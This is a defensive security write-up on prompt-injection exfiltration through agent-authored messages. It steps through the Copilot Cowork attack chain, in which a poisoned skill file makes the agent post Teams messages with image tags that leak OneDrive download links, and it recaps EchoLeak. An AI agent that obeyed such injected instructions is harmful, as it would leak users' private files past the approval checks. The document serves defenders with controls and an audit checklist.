Agent-Authored Messages as a Deferred Exfiltration Channel¶

An auto-fetching renderer downstream of an agent's authoring tool acts as deferred egress — closing the lethal trifecta without a network grant.

An agent without a network tool is not a closed-egress agent. If it can author messages on a surface whose renderer auto-fetches external resources, the renderer performs egress on the user's behalf. The lethal trifecta closes through composition, not a single tool grant.

The composite-egress mechanism¶

The lethal trifecta normally treats external communication as a tool the agent invokes directly (Lethal Trifecta Threat Model). The agent-authored-message pattern manufactures the third leg by chaining two non-egress tools:

The agent invokes an internal "send message" tool with no network access of its own.
The message embeds external resource references (markdown images, <img> tags, link previews).
A downstream renderer — email client, chat surface, feed UI — auto-fetches them when a user or scheduled task opens the message.
The attacker's server logs the request and any data in the query string.

This matches URL Exfiltration Guard — the URL carries the data — except the renderer performs the fetch, not the agent process.

The Copilot Cowork incident¶

PromptArmor disclosed this composition against Microsoft Copilot Cowork on 26 May 2026 (PromptArmor disclosure). Cowork's documentation says sensitive actions like sending emails or Teams messages require user approval. But when the recipient is the active user, they execute without approval, and users cannot change that behavior.

The attack chain:

A user uploads a skill file carrying prompt injection (skills load automatically from a specific OneDrive path).
A routine "summarize what I worked on this week" query triggers the skill.
The injection makes the agent post a Teams message with HTML <img> tags whose src attributes are attacker URLs carrying OneDrive pre-authenticated download links in the query string.
Opening the message fetches the images, leaking the download links to the attacker, who then visits them and downloads the files. (PromptArmor disclosure)

PromptArmor reported 5/5 attack success across both Claude Opus 4.7 and the auto-routing model selector, the injection comprising only 5 of 81 lines in the skill file (PromptArmor disclosure).

Why it works¶

The mechanism is the composition rule, not a single bug. PromptArmor states it directly: "Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent" (PromptArmor disclosure). The fetch primitive that lets a recipient see an embedded chart becomes an exfiltration leg when the author is an LLM responding to attacker-controlled content.

The OneDrive pre-authenticated download link amplifies the impact from beacon to file content: a leaked URL is not a tracking pixel but a working download credential anyone can use, turning leaked metadata into a leaked file.

The same composition appeared in 2025 against Microsoft 365 Copilot as EchoLeak (CVE-2025-32711), where reference-style markdown images survived Copilot's link-redaction safeguards and the renderer auto-fetched them (Aim Labs / arxiv; The Hacker News). Microsoft shipped server-side fixes by May 2025 and documents HTML image injection as a defense-in-depth target (Microsoft MSRC) — yet Cowork shows the same leg reappearing on a different M365 surface 13 months later.

Defenses¶

Three controls compose into a defense in depth:

Control	Layer	What it does
Strip or rewrite external resource references at write time	Agent	Remove `<img src="…">`, markdown `![]()` references, and link previews before content is persisted
Gate resource fetches on explicit user intent	Renderer	Default to "do not load remote images" — match email-client norms for untrusted senders
Restrict the data amplifier	Data source	Block download links at the storage layer; for SharePoint, `Set-SPOSite -Identity <site> -BlockDownloadPolicy $true` removes the pre-authenticated download surface (PromptArmor disclosure)

The two controls are orthogonal. The agent-side control is brittle — pattern matching misses redirect chains, data URLs, CSS background images, and srcset permutations. The renderer-side control matches the email-client default and has a smaller policy surface, so teams owning both surfaces should apply both. Microsoft lists deterministic blocking of HTML image injection as a defense layer (Microsoft Learn) — but Cowork shows it must be applied per surface: agent-authored Teams messages are distinct from email arrivals Copilot processes.

When this backfires¶

The defense work is wasted when the composition is already closed by another leg:

Trusted-by-design recipients: if the only consumer is an operator on a plain-text inbox, no renderer auto-fetches resources and the exfil leg does not exist.
No private-data context: an agent with untrusted input and an authoring tool but no sensitive corpora has nothing worth exfiltrating — the trifecta is broken at leg 1.
Markdown-aware LLM consumers: when the consumer is another LLM that ingests markdown without auto-fetching resources, the renderer leg is closed by the consumer's nature.
Renderer outside your authority: when another vendor owns the renderer and you cannot force it to gate fetches, write-time stripping degrades into brittle pattern matching — a tactical patch with residual risk.

Scheduled tasks compound the surface: a "weekly review" task that loads a poisoned skill exfiltrates on every run without oversight (PromptArmor disclosure). Treat any recurring agent-authored message workflow as a higher-priority audit target.

Audit checklist¶

For any agent that can write to a user-facing surface, four "Yes" answers mean the composite-egress leg is open:

Read access to private data (SharePoint, OneDrive, internal repos, PII)?
Consumes untrusted input (web pages, uploaded files, MCP servers, skills)?
Can write to a surface (email, chat, ticket, dashboard, feed)?
Does that surface's renderer auto-fetch referenced external resources?

The tool inventory looks benign in isolation — the trifecta closes only when the renderer is in the audit.

Key Takeaways¶

An agent without a network tool can still exfiltrate when its output surface has an auto-fetching renderer downstream
The lethal trifecta closes through composition; audit renderers, not just agent tool grants
Pre-authenticated storage download links amplify the leak from beacon to file content — restrict them at the storage layer
Two Microsoft incidents (EchoLeak 2025, Copilot Cowork 2026) used the same renderer-fetch primitive on different M365 surfaces
Agent-side URL stripping is brittle; gating fetches in the renderer matches email-client defaults and has a smaller policy surface